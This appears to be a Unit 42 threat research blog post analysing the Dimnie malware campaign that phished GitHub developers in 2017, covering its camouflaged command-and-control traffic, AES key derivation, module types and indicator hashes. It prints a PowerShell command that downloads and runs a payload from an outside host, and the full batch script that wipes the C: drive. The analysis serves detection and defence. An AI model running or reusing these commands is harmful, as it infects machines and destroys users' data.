Advanced WildFire
This post is also available in: 日本語 (Japanese)
A note to readers: The code samples included within this blog post may trigger alerts from your security software. Please note that this does not indicate an infection or an attack; rather, it is a notification that the code could be malicious if it were live.
Introduction
In mid-January of 2017 Unit 42 researchers became aware of reports of open-source developers receiving malicious emails. Multiple owners of Github repositories received phishing emails like the one below:
|
1 2 3 4 5 6 7 8 9 10 11 12 |
Hello, My name is Adam Buchbinder, I saw your GitHub repo and i'm pretty amazed. The point is that i have an open position in my company and looks like you are a good fit. Please take a look into attachment to find details about company and job. Dont hesitate to contact me directly via email highlighted in the document below. Thanks and regards, Adam. |
Though there were multiple waves of messages following a similar tactic, each one carried the same malicious .doc file as an attachment (SHA256: 6b9af3290723f081e090cd29113c8755696dca88f06d072dd75bf5560ca9408e). This file contained embedded macro code that executed a commonly observed PowerShell command to download and execute a file.
Figure 1. The attackers used a common technique to try to avoid static detection by introducing characters which the Windows shell will ignore but static engines will typically see as part of the string.
A more readable version of the PowerShell code is shown below:
|
1 |
cmd.exe /c "powershell.exe -executionpolicy bypass -noprofile -windowstyle hidden (new-object system.net.webclient).downloadfile('hxxp://nicklovegrove.co[.]uk/wp-content/margin2601_onechat_word.exe','%appdata%.exe');start-process '%appdata%.exe'" |
On initial inspection, everything appears to follow the same formula as many “traditional” malware campaigns: e-mail lure, malicious attachment, macro, PowerShell downloader, and finally a binary payload (SHA256: 3f73b09d9cdd100929061d8590ef0bc01b47999f47fa024f57c28dcd660e7c22). Examining the payload’s communications caused us to raise our eyebrows.
Dimnie, the commonly agreed upon name for the binary dropped by the PowerShell script above, has been around for several years. Palo Alto Networks has observed samples dating back to early 2014 with identical command and control mechanisms. The malware family serves as a downloader and has a modular design encompassing various information stealing functionalities. Each module is injected into the memory of core Windows processes, further complicating analysis. During its lifespan, it appears to have undergone few changes and its stealthy command and control methods combined with a previously Russian focused target base has allowed it to fly under the radar up until this most recent campaign.
Hidden Requests
Let us dive right in and have a look at a typical HTTP request from Dimnie to its command and control infrastructure.
Figure 2. Initial HTTP GET request from the compromised client and the server's reply. The HTTP payload is truncated in this image.
Does this malware use a (now-defunct) Google service to aid its initial phone home? Not quite. Examining the HTTP request, this appears to be an HTTP Proxy request, as described by RFC2616:
The absoluteURI form is REQUIRED when the request is being made to a proxy. The proxy is requested to forward the request or service it from a valid cache, and return the response. Note that the proxy MAY forward the request on to another proxy or directly to the serverspecified by the absoluteURI. In order to avoid request loops, a proxy MUST be able to recognize all of its server names, including any aliases, local variations, and the numeric IP address. An example Request-Line would be:GET http://www.w3.org/pub/WWW/TheProject.html HTTP/1.1To allow for transition to absoluteURIs in all requests in future versions of HTTP, all HTTP/1.1 servers MUST accept the absoluteURI form in requests, even though HTTP/1.1 clients will only generate them in requests to proxies.
Dimnie uses this feature to create a supposedly legit HTTP proxy request to a Google service. However, the Google PageRank service (toolbarqueries.google.com) has been slowly phased out since 2013 and as of 2016 is no longer open to the public. Therefore, the absolute URI in the HTTP request is for a non-existent service and the server is not acting as a proxy. This seemingly RFC compliant request is merely camouflage.
We know what it isn't, so we will dive deeper to figure out what is happening underneath the camouflage layer. Start by having a look at the DNS request that immediately preceded this HTTP GET request.
Figure 3. DNS request issued prior to the HTTP request above.
It looks pretty normal, but we can see an authoritative nameserver returning an IP address, 176.9.81[.]4, which is highlighted in the image below.
Figure 4. Nameserver responds to a Type A query with a valid response.
While it may not seem so at first glance, this DNS query is related to the initial GET request to Google. Below is the raw hex of the IP header of the HTTP request above:
Figure 5. Raw Hex of the IP Header from the HTTP GET request for Dimnie's initial phone home.
The answer (176.9.81[.]4) from the initial DNS request for onechat[.]pw is used as the destination IP for the follow up HTTP request that appears to connect to toolbarqueries.google.com. Sending the request to an entirely different server is not complicated to achieve, but how many analysts would simply see a DNS request with no [apparent] related subsequent traffic? That is precisely what Dimnie is relying upon to evade detections.
What the GET?
Since we have established the HTTP GET request to be largely falsified for camouflage purposes, we can now proceed to pick apart the initial outbound HTTP traffic. The contents of the HTTP GET parameter are reproduced below:
|
1 |
GET http://toolbarqueries.google.com/search?sourceid=navclient-ff&features=Rank&client=navclient-auto-ff&ch=fYQAcgUGKQ04yy+39O6k0IxaeU9Bgw81C6ft2+OPISgD8VPCj5hkCilXUZraPNCm&q=info:google.com HTTP/1.1 |
This GET request contains a single piece of data used by the malware: the contents of the "ch" parameter which is base64 encoded.
|
1 |
fYQAcgUGKQ04yy+39O6k0IxaeU9Bgw81C6ft2+OPISgD8VPCj5hkCilXUZraPNCm |
Decoding the "ch" parameter yields us a AES key which Dimnie uses to decrypt payloads. The attacker uses AES 256 in ECB mode to encrypt payloads which are push to a compromised host and decrypted.
The code below illustrates, in Python, the method we used to derive this key.
|
1 2 3 4 5 6 7 8 9 10 11 12 |
>>> import binascii >>> import base64 >>> from Crypto.Cipher import AES >>> a = "fYQAcgUGKQ04yy+39O6k0IxaeU9Bgw81C6ft2+OPISgD8VPCj5hkCilXUZraPNCm" >>> b = base64.b64decode(a) >>> decryptor = AES.new('\0' *32, AES.MODE_ECB) >>> c = decryptor.decrypt(b) >>> binascii.hexlify(c) 'cda59f1670cf48bf0000000011217350b14b3f2d4c6001006fb3b0fb00000000adf1de43000000000000000000000000' >>> key = c[4:8] + ('\0' * 28) >>> binascii.hexlify(key) '70cf48bf00000000000000000000000000000000000000000000000000000000' |
Besides the HTTP payload, which is an AES 256 ECB encrypted PE file (after decrypting, SHA256: 6173d2f1d7bdea5f6fe199d39bbefa575230c5a6c52b08925ff4693106518adf), the server reply contains only one other HTTP header that seems to be used by the malware; the Cookie value sent back from the C2 server. This Cookie is a 48 byte, base64 encoded, AES 256 ECB encrypted series of UINT32 values pertaining to the payload (when requested) or outbound data (HTTP POSTs, see next section) as can be seen below (comments appended after //.)
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 |
struct DimnieInformation { UINT32 dwUnknown1; // 0x00: UINT32 dwAesKey; // 0x04: Final AES encryption key is: Key + (28 * '\0') UINT32 dwUnknown3; // 0x08: Not used for encryption. UINT32 dwUnknown4; // 0x0C: UINT32 dwUnknown5; // 0x10: Can be subtracted with dwUnknown1 if higher than 0 but unknown use. UINT32 dwUnknown6; // 0x14: UINT32 dwKey2; // 0x18: Not used for encryption. UINT32 dwFileSize; // 0x1C: File size if file has been downloaded. UINT32 dwUnknown9 // 0x20: Can be subtracted with dwUnknown1 if higher than 0 but unknown use. UINT32 dwType; // 0x24: Type of sent/received data. UINT32 dwCRC; // 0x28: CRC of the received data. UINT32 dwModuleID; // 0x2C: Module ID of the downloaded module }; |
Here is a list of possible types which may be found at offset 0x24:
| Value | Description |
| 0x00000000 | Main PE module received. |
| 0x00000001 | 16 byte information sent to C2, probably PING/PONG. |
| 0x00000002 | PE Module received. |
| 0x000003a4 | Get module. |
| 0x000003a6 | Get main module. |
| 0x00002000 | Running process. |
| 0x00003000 | PC Information (Computer name, language, network card, …) |
| 0x00038000 | Keylogger data |
| 0x00058000 | Screenshots in PNG. |
| 0x00018000 | Unknown. |
| 0x00098000 | Unknown. |
| 0x00418000 | Unknown. |
| 0x00118000 | Unknown. |
| 0x00218000 | Unknown. |
| 0x00818000 | Unknown. |
| 0x02000000 | Unknown. |
The values contain a preset, defined size for the payload as well as an expected CRC32 value. Effectively, the Cookie parameter is used to verify the payload's integrity during the module downloader portion of the malware's lifecycle. When the Cookie value is included in later C2 traffic, it is primarily used to identify the type of data being sent back to the server and the reporting module.
More Camouflage
Data exfiltration by the associated modules is performed using HTTP POST requests to another Google domain, gmail[.]com. However, just like the module downloader portion of the malware, these HTTP requests are hardcoded to be sent to an attacker controlled server. Again, Dimnie attempts to blend in by looking at least somewhat legitimate, although the data exfiltration traffic is far less convincing than that of the module downloads.
Figure 6. HTTP POST request with encrypted data.
Once again, the data is appended to an image header and encrypted using AES 256 in ECB mode. The Cookie value follows the same structure provided in the previous section. This initial push contains system information as can be seen in the decrypted output below (data enclosed in brackets has been edited):
|
1 2 3 4 5 6 7 8 9 10 11 12 13 |
[netbios name] WORKGROUP 2 HomeGroupUser$ [Hostname] [Language] 1 10.0.2.15 (08-00-27-D9-83-51) 'Intel(R) PRO/1000 MT-Desktopadapter' PCI\VEN_8086&DEV_100E&SUBSYS_001E8086&REV_02\3&267A616A&0&18 4 Administrator (0x10203) [Username] (0x10223) HomeGroupUser$ (0x10201) [Hostname] (0x10221) |
During our analysis, we identified follow on POST requests containing screenshots of the compromised desktop and process activity lists which were encrypted and appended to a false JPEG header as described previously.
Figure 7. Process activity list, post-decryption.
Decoding the Traffic
Now that we understand how Dimnie retrieves its modules and how it protects them, we can use the derived AES key to decode the observed payloads from our PCAP data. The payloads themselves are never written to disk as they are downloaded and subsequently injected directly into memory. The module ID is stored at offset 0x2C as a 32 byte value in the Cookie field, however to calculate the "true" module ID we must use the following formula using the key found at offset 0x04 in the cookie: uModuleID = uID – uKey. Below is a table of observed module IDs, their functions, and type of information as referenced by the Cookie Header (at offset 0x24):
| Module ID | Function | Information Value |
| 0x20001 | Main module: downloads other modules and injects them into memory. | N/A |
| 0x20002 | DLL module which exports SvcMain and is injected into another process. | N/A |
| 0x20003 | Contains 58 bytes in front of the DOS header. Purpose unknown. Appears to be a copy of the main module. | N/A |
| 0x20004 | Extracts PC information and sends it back to C2. | 0x03000 |
| 0x20005 | Enumerates running processes and sends the list back to the C2. | 0x2000 |
| 0x20006 | Module that can logkey strokes, take screenshots, interact with smartcards and more. Uses RegisterRawInputDevices/GetRawInputData for logging keys. | 0x38000, 0x418000, 0x818000, 0x98000, 0x118000, 0x218000, 0x58000 |
| 0x20007 | Keylogger module which has two PE files appended. Both PE files contain the same functionality but are different architecture (x86 and x64). It sends back the logged keys and clipboard data to the C2 | 0x38000 |
| 0x20008 | Module that can take screenshots and send them back to the C2. | 0x58000 |
| 0x20009 | Self-destruct module which deletes all files on the C:\ Drive. | 0x02000000 |
The self-destruct module, 0x20009, drops and executes the following batch script:
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 |
@echo off Title System need to reboot computer! color 0c Echo Auto Starting in 5 seconds @ping 127.0.0.1 -n 5 -w 1000 > nul @ping 127.0.0.1 -n %1% -w 1000 > nul cls Color 0e Echo delete disk C del C:\\ /s /q @ping 127.0.0.1 -n 3 -w 1000 > nul @ping 127.0.0.1 -n %1% -w 1000 > nul cls color 0c Echo Remove directory Rd C:\\ /s /q @ping 127.0.0.1 -n 3 -w 1000 > nul @ping 127.0.0.1 -n %1% -w 1000 > nul cls Msg * \SYSTEM ERROR!HARDDRIVE IS OUT OF ORDER!\; |
The primary purpose of the modules we’ve observed observed is information stealing and reconnaissance. It should be noted that Dimnie's modular framework allows for a variety of capabilities to be accessed by its operators, thus the modules observed during the analyzed campaign may not encompass all available functionality.
Conclusion
The global reach of the January 2017 campaign which we analyzed in this post is a marked departure from previous Dimnie targeting tactics. Multiple factors have contributed to Dimnie's relatively long-lived existence. By masking upload and download network traffic as innocuous user activity, Dimnie has taken advantage of defenders' assumptions about what normal traffic looks like. This blending in tactic, combined with a prior penchant for targeting systems used by Russian speakers, likely allowed Dimnie to remain relatively unknown.
Customers are protected by IPS, Dimnie is detected as malware by Wildfire, and Autofocus customers can see related samples using the Dimnie tag.
We are also including IOCs for this malware family dating back to 2014 which include domains from DNS lookups (Appendix A) and dropper hashes (Appendix B). IOCs specifically mentioned in this post are included in the next section.
IOCs Mentioned in this Report
We’ve purposefully omitted legitimate domains and IPs from this listing.
Initial Phishing Email: b70a17d21ec6552e884f01db47b4e0aa08776a6542883d144b9836d5c9912065
Malicious .doc file: 6b9af3290723f081e090cd29113c8755696dca88f06d072dd75bf5560ca9408e,
Dimnie loader: 3f73b09d9cdd100929061d8590ef0bc01b47999f47fa024f57c28dcd660e7c22,
Sample decrypted main module: 6173d2f1d7bdea5f6fe199d39bbefa575230c5a6c52b08925ff4693106518adf
Appendix A: Associated SHA256 Hashes
15895f99011f466f2ddfa8345478b2387762d98eecf2ada51ad7f70618406ba1
7d8ec31d9d98802e9b1ebc49c4b300fa901934b3d2d602fa36cc5d7c5d24b3bc
046bc7347a66c977a89ba693307f881b0c3568314bb7ffd952c8705a2ff9bf9d
1b5e57fa264b2ce145b39f9fc2279b21f6b212aeca8eaa27f68cdcdbdef1900f
4b10cc374ed9e2c69231fcfa1b1d96496785ecf148f9445192f24385068e7b0c
e47ce23ec14114d3abeba090baa77b9bec876f947df67076dddb9087387735c7
d99c699e399afcd9e5abcff8c9b4a40af3e428f0c452c646653c79ec1a623bba
b6dc94f75ea4d2b46cf41079b1ac4cf48fe7786019396f379822fe6e21c9929d
a4df4a25e847d95a86a257bef7d2b349e9908bec37f0199f9f217d9cc0e28564
caba117fdf3ca61b1b17121adb4546e829df5426ab8944e5c4672f4a8619d0fe
3ffec5efb775c7d977f1e0ad1e8a51a111394e0ed113f58809fc8441b2c0f731
3d94881f0125093576dd01cd54cfd937cdca2b3050ad9aa4c5db2514d9aa686c
1d06464bafd24c228fd66df9cbf8feceda1346cef8648c2cd87cf617547bbe1e
9c403782571042fe2e3efb3acc35a26867956235a2a9472798bd664b65698c3a
d0eaec396ae11110dc4f51f3340d4735790876510de438f8a161577c7aa72d1e
222beafedbb604d200099cee657505f1d11b371403c7c9c12103adf28a561289
0f76bcda668095a8d2fe7a1282d463dcf04201e1c5a35856f117703bcd9428ef
c4bc691d7b8a16ff68ed338878451d1ba681aa181922cabd0b999b935ded673e
67a1dead18afc43c69a97de3e39bd84dec91df751a45bbda7ac5874f746c147c
7c4c2c898f611fd12a244822f5a2080da51126713d4ed1b3c950aa0ba6f92d93
67df79166bb258e77959c326c21563ea41f3f119d8e8486043efb83c868e636f
5661e7c23ed6058157b39ed29fa37690148d377b1faa7c7b89024daf0ef7e904
bbe7abc992928a45b618fbd7fbdd472ec3e4a47126f21ec38ad8257afe0c091f
05e30073cbd18b0ff2cfeab307e2e8cd2226d921a1872f17fcc312fc601fa93e
4a25bf18783ad32e08aaff0707d8fdae88647da4e0bfd22d83850e0dfa4ab148
3109724914f0eec8ee5167b15e43fc71e58106983ad0d2137c96239d5b25ad7c
c333173687879f3a6387f5afd915d9a4f042ffeb96f4cdf4514a5433de558f6f
071d91e67c42811d96d15a4a6dff740cc5d704ca352d9bc03778a2a6abd552f4
d884ae7b4f88973d2fb763b00c41171353310696e66dcde5733558ca68cd68d5
3944c7586e17399051785e1ae0311f4b98e74825291249a784428a64a80240e5
f76fe0b83e45a77ebc36ab12a27a5cf49be74fb154c51cb793e946c45bc4e12f
9f2367e31987327ef5710f7dcbfa089382c1967247c5ac1e2342e1e10e495fb5
5f45450f3342fd4f7f08651d58f775d47a25a44758039a577811eed6c094dfa7
824b93c4662cdc072488cf82d34569dd27d6f1fced5cb83f045825ed2e4b463c
441b1db0595565ac059552790e96524851843b22787238291f286b16c9c951d4
ba6022401ed257f82b7107319a7ec928044acd3dcb60dfab1ac7df2823ffef25
0a5c9818aa579082af224abc02dad60d77f4ded6533d143100b7744b58e289a2
871cefc4f9faf8658804dbe8332e3b511172ea29545e13c303ae1809edf8a0f6
bf3869e420ac8686b9ae3b14d679f45b34909ff998887f9fd0c8126853d6a4ed
8eef688751eed591bedd2fcc18d32bb84df11fdda62a16c963561aeeae56f6f4
c18775abf5c992cbd9b3b0c401fb0ee66bbe092e44b0b1b3cdd17fdc353d825e
ea6a8a46b61e2a8813c4146461e4c961dfb2cbcf277d8bb9edfc14be73f9f073
119972c1029267df7c5a8e607a2f034e7f8a3396ea49c67430842e0ff2de70eb
488c93d2e5413b974f489030c1f7484d2a6610cda0dd5a389b6a30371817d108
4ebb33fcf64afcd534ac83e72e49a4392b586bd31ef20b7bea2717cb9cde4928
a8779654e5abf142aaaca29b1abc0cbf1f5430e8a8fe7d955ae3ba6f1a9a3747
445e1aaa68169f30efa3d7d04f378c646abbbb3515430005b66d9e9ac182006c
417d6ec4701da0396bdffb8da0d582dabde35dedf9d468bcbe36f94df6dcf8e3
8a4748311e74cbf4f66a55ee4561728d0542929e9c260eda6d30bbde054fa53c
6a71582fb919a1300b98b035eb154602bf5452ff80d364a1f6603240cdbd8293
b01756a3f4b8d687a9fce4301f5f56b4dfb7befe29550096b262935f63f02cc4
b91fbf574bf080af82cd24977d00205dc0860ad7afb01f8f4a0ce0f910f9de6e
829797843357a5417f4de7b7f8f970ccfaccf30ecc80ed9c15e796897012d3e5
b10a1189aeb784c899bb5eb46b6cf1528b2ef6e3c0673159db4438e7aa39f6d7
2ba2491ce6a1814206dfe2aa9b1129f6085f1a18fd9b8c831caad286b095ee90
78961c49fa961bac01ebc8ef62077bc8fc8a3389f39fd7ee9d655447f0282fe2
aaa1511a156a11cff7e09367184972c067b65cae6573a8b4844dbe0a01894118
e64678633c8e876fc9313bfe5a8401953eaefdd8e7e006221cd5009f471fc389
2cedcdaa116feed52819914db3f19edf58c004a4a28c62f556d2ce3ced84b0f6
417addbd5817cc9dcf4f77f6240a56cd11a94c9a89e646d589e5ed26710cbcac
ff19d4f2c6527b2d4ecf65fa85115fddaec5420ef4346e1b6a21b28ccc5604b5
6e676f6be660799fbb4037c0c1ad39f9933b3e84cba0642fb7b892465b87325b
f9531a1ca3ee933812b709cc07a7d6ab6f8ee9900eee64ad97e936a68c5847e5
df56d66b8d9a16258a0b449084e3d82f8e338f0d0ff140bbcec1848357107dda
81ff2560c2f999d51f45b62110a5d37921a94d1af47f694780f9df8ed6c932ca
f9e6817f348cbfc4ca672ea275f3da390c31b45266e57b1f0f13f7c7ca37a3eb
eda0dfc38e7f32efe209902e653553a231de906b3a8894d31c3e39bd3a7e3a99
567cce05449594ed622160b443e81fb9e38989d830749d9e8bb5853f73226d11
62b8b1c425bce735789ab19b7e520304d85005df418221eb0f9b242d9e671a45
03766d99a1d7551ac4056c121c017ae70443d50c152ec1b06249c891baed435a
1d0a9d2e3c08f54b95575e4341f1d9699eb29ddbcf45757b1814ceabc9418a03
7dcda64fdfb2069f3b5f5047cfac6f2abfb6a2fb7591f974e5c0348ae86b6909
913589ca3fa86f9de6582204040753c779dd830e33876de338683587d7498766
590a4dedb34956e454d384e882440e731d50a83a819cfef000596d165a7d32c5
d0b44b803893fc08c08c653b2e0ca2ca2e2f52ef8cd49f0ac145337af5b2175f
cc74ef19129d061ba97801839ff04c00df07f684ff62df89061d7694c3a9c244
302b0b3731f86facb6be3fbe8eadf18d00d696175fc1590fc012b9c90fd60de6
bf4b6f9f28166c0c6916548694a09f98ab5e4e9c3012323b3a5fb3e6a6b33d9e
b857f5244e18fa9efc9b820dc70b827674f28bcea9ab7ef666e2271f0de4c9ef
0a46ce6d1d54fed2b200622ad0d5977e00e7865fe26c4cc69efa573e1ae542ad
10b8eaae1e00dfb40186a1d32f0c3cc10a47b9258afbbbdd81569b96b2c79a07
7b23f7c1ca90affc891ac89d6c9b592e0c47f1a539b9e8a87f6431fc0158404f
cc8585b57a9a371fb6d7250395bdcddca07150a7dd97c3a9dd67e408812feb8e
35074e717332d8fe3336448c8cf065bab56b978819b4685e618b094674be06df
a60c52336dc58251b28fba6345f75236bd7cf82c19702fa777fc926f04a5f75f
0bf94cbf7120ba5810c24772ba9752d22a31129cbed2009ebbed5bce18c916d5
052e93c7733e1a1fc5094682ab3cc3324b838d5260a1bed899ff93ef0966608c
3a9ec7a665475ca2f8e4eb314a3b845a727b3a99a818263284604b76b1857960
30d40c80ead9fd48b39aeee9c6f9d38951470d16bbe2bac09107d66f197cf012
e91c5056fc764bea87cc5a265a18c93140420ac15b030fa061f4e54e453d6c1e
5893e01e6ac20cfa75f184d1f6d708e3ccb3ff6da9f5183da415e3126e4d84b7
2d9b959ad8e19d2dd1d60e1bcbcfb014fcd9d671316b310d864fb2d881c16462
770c79684d74bdf8fb6d0d7cf138ddd06fdf7506e91eab09d79ded677f04ab98
98bbf1b17196a525e810689833dae910b144daf8ce85f31c73b9d0ca2dbdc426
0c760dc72a02073921d696840c31a372648a9f964be0afc0bd14554cb3a6be61
66f3b47798a56b74517094038862ce1a4555e5c975427db3b00835377cc26725
21e406638bffc35ad1929c5b03a0bbd42d1a39fb481d1954e0c15135e01e3c6e
01431670bfa2a14419323ba4731e2b9f03d9bc7362ae78b06792eb605249ff0f
517db060d4b0d8ae3a22d37f67311d9f5e2bf93d07424a4b9be5fefe84c571e6
3eb15bd22b9c70cfaa57a08eccb60de60e6bdaba00489ad0c61139504ec1b274
cc7b1846fa441c13cc03a8089013c55fd8c7bbabde049cf578df2633afebabff
eb47d187d81488b11690ac3191ad8e17774d8a11e559d692fcc344a905c34183
7f8c517b0873991b320d3f94e76f639afadf1481550c8931bae2b46afe204aa9
414475578f2d5642be77f2ea18df1f3ea97fc78a5b985944076c41f8b6e3fa54
a9fc88b00fe9ba84397aa7eba29a3dcc34da69a2eb89d9135cbfc04725605703
d390f1198f1b0c2307859b523a8fca918994c48cc630bff60f1b1fe159f974cb
fa56be12aec3eae896d372839d20bb02f45a8f167cfb44ca9b9e517f8bf454c5
8f0cf083af5412a8c228fe8d7755c2dd186248bf73de5db693019a0435de7dad
e593d990025104eeacc1bf48c3cf02a9f4503b056e6f17806dbc82e66f1878cc
6764806968caeec57f239584098f45eb4cdf1c1610d1a85b5c065bd4a3682fd9
63aa7d6759523c216de2bc85621f34d2a08f6c3c9dea8f4d3e0d1eae28afecdb
4a8336797a98e2f74062a477cf88a1c6be603102a3ead70d69823c5d3306536a
0595605bb8b6f4369e04be003c8de77d60d51c676bf463452758f0441c3dddac
611f0f92151aef878550ca0cbfb98433180607f374f5b68b72393a3d43f65381
7e275e43f70ac7962e5f4b503521af1862ac86ac8952aad52f7ff8452463b6d4
fd7f3195d0b9530131c5860e5db4755f9bf95c5cdc2b1c5563be5f49b0d35857
2fee7fbabcf1b4381ec3c8ef951bcdf9e204b9d8418815cc84efdd909a882413
f423bf186440e7ac1924a75bf3c532d61d62592d664e7bb004c10881fda3bade
3e21da2bfb27dc428214f94f6424b3d745e5590df45f333ad1f20552afbd410a
7ccdecd7997e78e766e2eddc1dd0d5b2a0ff8d601a7acaddf024c0fc2f4204dc
fc9b309039e083e390627f8203b6428a51ab570b3839a1e1efcc4b2855803fab
a1ca4464b092f361ae6c0bf60867c93fb507ca3f9c6de045979d708997539a7f
8e6d0b88a84ce804938ea9b5c41b0ed497ce00b070ce0b596913b4dc65501352
2aefd28e364b92ea42573d5f937ec53bd864e73cd8b7d40da27cbda2c6f9592a
86bd7d9187a273a9b0082ca84fcfec05d7f7ad5fe03360533004eadd64a86017
20b1853bec49af02aff6cd22b2c25e41a48df7a2cfbff785f6a110eff8742f6b
beb5a1afc328ab2f34f56a65ff4161d37be91adecfceaa83a2bc20b63fd35eed
3998a7feb58bc3f4741b9585ecdad04b1d16026ba116630c0d7b69f2651a9ec8
82fc70f991759e53daa66f2cc4f0873426049215b073973365341b000fa26585
2acff0e4efcf15d9b21f15869b955cfafa8f188d7e38de52c729c260d3cffc4c
9aa03d7f128678225dcdde8b8f8a792b7d56c768afde401a7ee779469a469271
03262308f43830db8fa4c3568aee387df5de96743c287bc6b49bea309b2dc373
95637e684a42583be98f3c1d2567cb5bdc3e7fcb875f054b58b1036f32834ada
f3ac0db23744528e8169c1bc58c844b0fdfa4129c5e8700b4bffb07daa75d1e4
e38804084d5cb0e7e80fd9144ed012dc92e89b68586dc2611ee90392d2fe46f7
6a1999cd18373653766b9385c3e60a3f21ffa040180172eb206142f601384d76
85176e6b449dc548af04c29fe13e8622c275c84691d449d6392607013f6fce07
d653637357b94b8547f5d81e78248c5f7dec8f64a3f7918563c1b5fa9086b3e8
97ee5dc97b2d21d299034cb02cc814a63494a31689afa3be9e47015b40b8b308
b1f47264a60d732ad917770406badcfaa3b845d85841c46b27ea758ee82f18c2
201480d3fe6598cb7557c4940e5db96e71de9a15364b19865ee61c11658e2b5b
ed9f3dba0c9a987094d1921e5316398aea169bf907ce848d6518ea40db15c46d
c2ba05bbebb35e99780c87e23a3d6f7b05ffcb17b21ee27f05fb62ec13e25b0e
abc4b46a96f432605336dbe376a92feeb77d768c473d52b725a853a3abeae92c
b2eae31ae2fecf69a5940e5e7d3ec90b241bd1223a4af25204676b67a176c88c
2d2c65e64f18e38991c609ca7d16cafb928c5c96132fe8f361dc3f31473b93f7
5750fcf5b4e31fcab9e81f154e1ec04105dd909f46ffdb9bcb986d7da9e6c22b
8ab4e92cd37cda1273f2359ec8d2c4b9cc4cf02faa199f8fe71f4f200a3ab31d
c693c3983f3c6e2e20d338ba240ff7411121a674b267ff86914156f9a91d5be4
cc05d4bffba7464194bf25ef5f8dfe9541048404b29e31fa93392663b1873501
375005db3906b1aad931c0207932ccdc99a191e9ceb100ae364ee1f2ca15682d
f9b85d337aeba34d23cbe1340f596cc908f572cbeeb5fed4fb389d779c7d5004
941007ae7918e8eb1845598053cf7fc4b0c17d708c2dbd1d1b13d2dc12b138e1
6069b42bfdf59ce5ec95f068e871ee266fa7593457eb4b38dda113014be87ce6
d3f4e3459bbe753ea8c022eef425d5b098b0f32c0e4cc4f390442d9796ed4ee2
9dd9befeefdc13ae72bf90952892eb357bdff72083c282fb73dd3821afe43e72
eb1f746dbdc2598757423e4505ff898b8308282e638f9b940d84870e7a196fba
32b7a4f26eb3e2f44eeb82b95f9971572aeb82f1e218bbad39b2a8238d1448bd
e3e708a03186f373d002e6e84c649bbd95668c2c17dee9c7fb0143f3d675837c
b909e6e7f909abbb57af26b244b330f822ed552a3c4dadd028079d8070108c10
813fdde0b998bda3247eadab873677972681274b4a9905030bf8d76727d57a6c
0353e9168983735e8efd2d53b4c498b7810f49e67169e33eb42ed2ef8d3a13eb
49b2fae0ae4d9cf71c2766a0d965d8a50bacd8c522eb45656b8b5f6a1c7c8f51
54e54c459dbe3224d3f4947b30f20b365224552afac4bd45ddadfacee9a7cbe2
6b8b394add913d3c410787f0c711217fec60a917872465de04290a8003b73535
3977472c733eafb7e71f8fd6fece5d2cfc849ec88e9d6942082531f3f88818b2
b2faf0d9f8f436968f3851ae863f3b3d9190b1be5856f2bd044e6b04447efa2f
53e4330ba988627e5f1f5544f23fae1c66c0f2d714a922b1130a1c9dc2efeda5
2c5871fb46e6fbf95266830ba7b4923449d0bc99a4efd7586ff5556ca049ea1c
20b2c347268546d317711aa693d078c0dcac247e486e3b87e45b099fabdff607
c8dee4c2212c7bf8eb9cd7635ff42526b17340fb198a801cdaa8d4ef72a3c1db
c3511e8d5de1ab2146ddb8ecc735890ef5cec0b31d175fca2fb2b88d60ec3e43
947e55e3454031972cc3d11006a60091b2197cc9e241e562ed900b82e4f28bd9
ba03da023f13796dd6dd70db0234da5df33ddc18ba274cdc62c282d56c695ece
de3aa81710f2580d3ac690c1f6d087a4672f29ccaa36e3901e4904056f83a48d
b3f371cc899440583095bac2817fba2ae2c7c3cac9c121d0798e03730589ad33
daefdf3c053971d35eb4a7447cf74c0335066d557ddbe56f01611e8b9a38b512
0dac129154c01867ca391da20227fdf7d7e3a9dd4cf42eac76833a051153794f
dd3ada0bb17356592e13bae5961c0bb131e645d2c957f1f2047cc25528f60518
f94b5803298a18b6ddc5eab202db6ae4e7199adf298ce16698e8053a36d5f934
6e7cb2c05000d0e609cebdb7d598fffc48eb5e7d1d589fc0947e322cdcffa070
dfc6ff1c54d3b7c2d6aa3ab9573debfe83b2d9a82c20b765a852c77d792ab10e
a0af21826f06da5292dfea3574648137292e31df1cd70a8262f03354dabfb38b
788222fe51e7bc91ce229f67557843db34e1ad68296069ed3235b022407fa610
858dc8648024588c644466e0386e101a925295f4b8ba3e3b7235aab7eee2788c
25eb81fc61b60b1a01eafc040b292b8c206a883555d1db3b80103f6a09b92f7d
a0ee38e7edac534827a1501bcc535ab7f604abfe654eb34b330ececc544cb084
c870b4dffa82f8b60efaf7b98875e4f823a207dfb2f0023ca1700392ca91c5c0
cb677ce864730abb68cb007f5ce3cf067fa982d5ec5e79402f4dd28506f763c7
29c653c91fa209754ffdc7d5d450df1eacea065eb327943d613a5341d4d091b7
0919a323113724b2e8734a3178996cedee88f827f7706423acf8407568a93bce
4aceb41286ad09a78a31006e65c374fd82f3f0682592cfa1b06a390b4450404a
8a1d7fe6146ad99ee806586f217e067cd34d5bff7dd44d516e08576c22b1a382
6905b72571b27eb36191c5394fdb8aa91a25561e2f65bb7f6283cd67b8b42695
cd0fcb23fe5387245008d5aba8e9f937bae13da0f5319e4c0952a0e5f8715fca
927d28f4be7b208111298aede19ea6a33d69769081747504a2a6fc0e65596582
0f7810dddc7f204c7da31f6d599ddf7b671dc635aa1c415dd3f5a65ffa0d72e9
665079b17747eb20e80e97a8d8b432fd3760cbe72edba4bac5f3dc95e2576d57
d24c97b62ed06288d3887dd9b720da4900e8703360fe48d62899e6ee156eda20
1d130eee41544ea7389f90a1cc19d2535ab5236985912c3cc000e5a9d2416e81
485c8b3339b13cd8cbb52c03b1024665f9307490a107c0bd8205cebf76cdcd3b
fffef40864cecb56422bb793055749084ab1d756a35075d60cd547b2a7b074cd
444dfc3bbb7406135002e3b6a75e48cd4ac40bb3213f9ba4836ad202e5fcea4a
d13c9c157d9ef56620698b20e2ffca8d9dcac3dd3109382098f423ca9588031f
0f710fb601b78993e28808184c8e868a474dcb679d61bd80e01f215eecf22f83
4a9c473209596f2abb19c0a15b638458ef2c27a208053ec6f89b7b5e8efc882f
b36087991947633cfb1d758065323daf9e2179f668a31e6f639d85f946bef3cd
93ce0b122022fbd855b22e88b6598f705a319154cc3b6693f0a55fee8382fdbf
dc0bbbd2d6b7d37886059415d6cdcb4ac93b55ae06162670407b6aa0eaf44b63
ebfb311bf63b625ddf60d925669cf6b52a8980636a7b1536341cc78ac494eeb4
c7b07e16f61c792b8ccf5de098b0b291957b83184786b578bf87dcf3aba06d1e
